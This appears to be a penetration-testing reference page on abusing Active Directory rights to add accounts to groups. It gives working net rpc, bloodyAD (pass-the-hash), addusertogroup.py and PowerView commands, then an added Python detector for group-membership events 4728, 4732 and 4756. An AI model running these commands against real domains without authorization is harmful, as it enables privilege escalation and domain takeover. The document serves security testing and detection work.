AddMembers

When an attacker controls an account that can write a group's `member` attribute, they can add arbitrary principals to that group. This is possible when the controlled account holds GenericAll, GenericWrite, Self, AllExtendedRights, or Self-Membership (WriteProperty on `member`) over the target group.

Once we have found an account holding one of these rights over a group, we can abuse it with the following commands:

net rpc group addmem 'Vulnerable Group' otter -U 'domain.com/otter%SomethingSecure123!' -S 10.10.10.10
# verify the change took place (the password is quoted so the shell does not expand the '!')
net rpc group members 'Vulnerable Group' -U 'domain.com/otter%SomethingSecure123!' -S 10.10.10.10

If we only have the user's NT hash, we can use either the pth-toolkit or bloodyAD:

bloodyAD --host "10.10.10.10" -d "domain.com" -u "otter" -p "ffffffffffffffffffffffffffffffff:<NTLM_HASH>" add groupMember groupName 'userToAdd'

We can also use the addusertogroup script:

python3 addusertogroup.py -d domain.com -g "Vulnerable Group" -a otter -u otter -p 'SomethingSecure123!'

From Windows we can use PowerView:

Add-DomainGroupMember -Identity "Vulnerable Group" -Members otter -Verbose
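Each of the commands above, whichever tool issues it, ends up as a group-management event on the domain controller: 4728, 4732 or 4756 ("A member was added to a security-enabled global/local/universal group") when Audit Security Group Management is enabled. The following is an added example, not code from the original page or from any of the tools it lists. It parses a constructed, simplified key=value log format (not the real EVTX/XML layout) and applies two rules: the actor added their own account (the signature of a Self / Self-Membership abuse, exactly what `otter` adding `otter` above produces) and any addition to a watchlisted Tier-0 group. The watchlist, field names and sample lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows Security log event IDs raised when a member is added to a
# security-enabled group (global / local / universal respectively).
MEMBER_ADDED = {4728: "global", 4732: "local", 4756: "universal"}

# Watchlist of high-value groups (constructed for this example; in practice
# it is loaded from configuration and kept in sync with Tier-0 assets).
SENSITIVE_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}

# key=value pairs; values may be double-quoted to allow spaces and commas.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
_CN = re.compile(r"^CN=([^,]+)", re.IGNORECASE)


@dataclass
class GroupChange:
    timestamp: str
    event_id: int
    subject: str    # SubjectUserName: the account that performed the change
    group: str      # TargetUserName: the group that was modified
    member_dn: str  # MemberName: distinguished name of the account added


@dataclass
class Alert:
    reason: str
    change: GroupChange


def parse_event(line: str) -> Optional[GroupChange]:
    """Parse one line of the constructed format
    '<timestamp> EventID=<id> Key=value Key="quoted value" ...'.
    Returns None for any line that is not a member-added event."""
    timestamp, _, rest = line.strip().partition(" ")
    fields = {}
    for m in _KV.finditer(rest):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    try:
        event_id = int(fields["EventID"])
    except (KeyError, ValueError):
        return None
    if event_id not in MEMBER_ADDED:
        return None
    try:
        return GroupChange(timestamp, event_id, fields["SubjectUserName"],
                           fields["TargetUserName"], fields["MemberName"])
    except KeyError:
        return None  # malformed member-added event: required field missing


def member_name(dn: str) -> str:
    """Return the leaf CN of a distinguished name, or the raw value if it has none."""
    m = _CN.match(dn)
    return m.group(1) if m else dn


def detect(change: GroupChange) -> List[Alert]:
    """Apply the detection rules to a single member-added event."""
    alerts: List[Alert] = []
    # Rule 1: the actor added themselves. Legitimate provisioning is done by
    # an admin or a service account on behalf of someone else, so a
    # self-addition is the classic sign of an abused Self / write right.
    if member_name(change.member_dn).lower() == change.subject.lower():
        alerts.append(Alert("self-membership", change))
    # Rule 2: any addition to a watchlisted (Tier-0) group is reviewed.
    if change.group.lower() in SENSITIVE_GROUPS:
        alerts.append(Alert("sensitive-group", change))
    return alerts


def analyze(log_text: str) -> List[Alert]:
    """Run the rules over every line of a log and collect alerts in order."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        change = parse_event(line)
        if change is not None:
            alerts.extend(detect(change))
    return alerts


# Constructed sample log (not real telemetry). The first line is what the
# 'net rpc group addmem' command above leaves behind; the last line shows a
# third account being added to Domain Admins. The 4624 logon is noise.
SAMPLE_LOG = """\
2024-05-01T10:22:03Z EventID=4728 SubjectUserName=otter TargetUserName="Vulnerable Group" MemberName="CN=otter,CN=Users,DC=domain,DC=com"
2024-05-01T10:25:41Z EventID=4624 SubjectUserName=otter TargetUserName=otter LogonType=3
2024-05-01T11:02:17Z EventID=4728 SubjectUserName=svc_hr TargetUserName="HR Staff" MemberName="CN=jdoe,CN=Users,DC=domain,DC=com"
2024-05-01T11:30:09Z EventID=4756 SubjectUserName=otter TargetUserName="Domain Admins" MemberName="CN=backdoor,CN=Users,DC=domain,DC=com"
"""

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        c = a.change
        print(f"[{a.reason}] {c.timestamp} {c.subject} added {member_name(c.member_dn)} "
              f"to '{c.group}' ({MEMBER_ADDED[c.event_id]} group, event {c.event_id})")
```

Run as-is it reports two alerts: the self-addition to "Vulnerable Group" and the addition to "Domain Admins", while the routine `svc_hr` change to "HR Staff" passes. The self-membership rule is the one worth keeping even where no watchlist exists, because it fires regardless of which group was targeted; pairing it with a periodic audit of who holds GenericAll/GenericWrite/Self over each group closes the gap before the event is ever logged.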
